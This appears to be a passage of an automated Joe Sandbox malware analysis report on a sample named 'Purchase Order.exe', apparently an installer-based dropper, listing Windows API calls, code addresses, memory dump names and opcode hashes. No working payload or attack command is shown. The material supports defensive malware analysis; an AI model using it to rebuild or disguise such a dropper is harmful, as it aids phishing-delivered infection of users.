                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1096422788-0
                                                                                                  • Opcode ID: 90e07bb3a0b3f4804eab7f86ac5a4e71b50077df0b3d61eb17d11243db03f5ce
                                                                                                  • Instruction ID: 863d308e192ce4c0f66b0ae01519e0470cfafd3cecd099ef988cf845eccf6abb
                                                                                                  • Opcode Fuzzy Hash: 90e07bb3a0b3f4804eab7f86ac5a4e71b50077df0b3d61eb17d11243db03f5ce
                                                                                                  • Instruction Fuzzy Hash: D1E08630A04208BADB10AFA08F09EAD3A79AF41710F24003AF9507B0D1EAB84481DB2D
                                                                                                  APIs
                                                                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 96c910dea8fbf951c2b9a4b5f3b3c3063cfa5e5189f353d5a1020b82a892de8f
                                                                                                  • Instruction ID: bac0d5995861a33a007bf1aced2086678d13136d77447ce7e9e78d56ca3cc0cd
                                                                                                  • Opcode Fuzzy Hash: 96c910dea8fbf951c2b9a4b5f3b3c3063cfa5e5189f353d5a1020b82a892de8f
                                                                                                  • Instruction Fuzzy Hash: DCD05BB2704115EBCB10DFE5EB0869D77B0DB40365F304137D151F21D0D2BADA559759
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(00010436,00000000,00000000,00000000), ref: 0040413A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                                                                  • Instruction ID: 75e74fd11ebe5bc6c3f22cf38e5f61c8940f983f04da59faa373adfcae7f6129
                                                                                                  • Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                                                                  • Instruction Fuzzy Hash: 82C04C717442017AEA218B519D49F0677586794700F6544257320A60D0C6B4E450E62D
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F75,?), ref: 00403285
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 973152223-0
                                                                                                  • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                  • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                  • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                  • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                                                                  • Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
                                                                                                  • Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                                                                  • Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19
                                                                                                  APIs
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403EDB), ref: 00404108
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 2492992576-0
                                                                                                  • Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                                                                  • Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
                                                                                                  • Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                                                                  • Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  • Opcode ID: d70777c03fab58a6680eac8bb77f8d646d92531b9a9c42126c115ca3ec13432e
                                                                                                  • Instruction ID: 6696c5b565abb4b072559f1c40de02a1b67f072cada9199909c9bbabd3d4a8ec
                                                                                                  • Opcode Fuzzy Hash: d70777c03fab58a6680eac8bb77f8d646d92531b9a9c42126c115ca3ec13432e
                                                                                                  • Instruction Fuzzy Hash: 1CD05EB3B14141ABDB20EBB8BAC445E77E4EB403257304837E502E2091E6798A428618
                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2762281649.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2762228322.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762310776.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762334808.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocGlobal
                                                                                                  • String ID:
                                                                                                  • API String ID: 3761449716-0
                                                                                                  • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                  • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                                                  • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                  • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404AA5
                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404AB0
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AFA
                                                                                                  • LoadBitmapA.USER32(0000006E), ref: 00404B0D
                                                                                                  • SetWindowLongA.USER32(?,000000FC,00405084), ref: 00404B26
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B3A
                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B4C
                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404B62
                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6E
                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B80
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404B83
                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAE
                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BBA
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C4F
                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C7A
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C8E
                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404CBD
                                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CCB
                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404CDC
                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DD9
                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E3E
                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E53
                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E77
                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E97
                                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404EAC
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00404EBC
                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F35
                                                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404FDE
                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FED
                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040500D
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040505B
                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405066
                                                                                                  • ShowWindow.USER32(00000000), ref: 0040506D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                  • String ID: $M$N
                                                                                                  • API String ID: 1638840714-813528018
                                                                                                  • Opcode ID: 83e2ede0a7d074a44b451b0b1dd27b036aaffd7360a27c1076ab9aa670ade9c5
                                                                                                  • Instruction ID: e0cc5522092fb32f5c2674b78011ac89e49f6c9f2dab24d514a8ff43177d9d20
                                                                                                  • Opcode Fuzzy Hash: 83e2ede0a7d074a44b451b0b1dd27b036aaffd7360a27c1076ab9aa670ade9c5
                                                                                                  • Instruction Fuzzy Hash: 1E025EB0900209AFEB209F94DC85AAE7BB5FB84315F10817AF611B62E1C7799D42DF58
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404569
                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404593
                                                                                                  • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 00404644
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040464F
                                                                                                  • lstrcmpiA.KERNEL32(Call,Nonbeneficial Setup: Installing), ref: 00404681
                                                                                                  • lstrcatA.KERNEL32(?,Call), ref: 0040468D
                                                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040469F
                                                                                                    • Part of subcall function 004056D1: GetDlgItemTextA.USER32(?,?,00000400,004046D6), ref: 004056E4
                                                                                                    • Part of subcall function 00406162: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061BA
                                                                                                    • Part of subcall function 00406162: CharNextA.USER32(?,?,?,00000000), ref: 004061C7
                                                                                                    • Part of subcall function 00406162: CharNextA.USER32(?,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061CC
                                                                                                    • Part of subcall function 00406162: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061DC
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 0040475D
                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404778
                                                                                                    • Part of subcall function 004048D1: lstrlenA.KERNEL32(Nonbeneficial Setup: Installing,Nonbeneficial Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
                                                                                                    • Part of subcall function 004048D1: wsprintfA.USER32 ref: 00404977
                                                                                                    • Part of subcall function 004048D1: SetDlgItemTextA.USER32(?,Nonbeneficial Setup: Installing), ref: 0040498A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$Call$Nonbeneficial Setup: Installing
                                                                                                  • API String ID: 2624150263-2814887072
                                                                                                  • Opcode ID: aa897a388f026c859834b9177abdad11152a1d64c9f36690aee5ee8c86f27191
                                                                                                  • Instruction ID: 7ea719a0b93bcaca37b111b678a2b5d6f3f78fc0ed79788128ac85d93e839f9f
                                                                                                  • Opcode Fuzzy Hash: aa897a388f026c859834b9177abdad11152a1d64c9f36690aee5ee8c86f27191
                                                                                                  • Instruction Fuzzy Hash: D5A18EB1900209ABDB11AFA5CC45AAFB7B8EF85314F10843BF711B62D1D77C8A418F69
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2762281649.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2762228322.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762310776.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762334808.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 4227406936-0
                                                                                                  • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                  • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                  • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                  • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                  APIs
                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004042B0
                                                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004042C4
                                                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042E2
                                                                                                  • GetSysColor.USER32(?), ref: 004042F3
                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404302
                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404311
                                                                                                  • lstrlenA.KERNEL32(?), ref: 00404314
                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404323
                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404338
                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040439A
                                                                                                  • SendMessageA.USER32(00000000), ref: 0040439D
                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004043C8
                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404408
                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00404417
                                                                                                  • SetCursor.USER32(00000000), ref: 00404420
                                                                                                  • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 00404433
                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404440
                                                                                                  • SetCursor.USER32(00000000), ref: 00404443
                                                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040446F
                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404483
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                  • String ID: Call$N$open
                                                                                                  • API String ID: 3615053054-2563687911
                                                                                                  • Opcode ID: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
                                                                                                  • Instruction ID: 93f755629d35b640548b5af6b7c61ab120d2ba211fed136cde477a70902604c8
                                                                                                  • Opcode Fuzzy Hash: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
                                                                                                  • Instruction Fuzzy Hash: 5D61A3B1A40209BFEB109F61DC45F6A7B69FB84714F10803AFB057A2D1C7B8A951CF99
                                                                                                  APIs
                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
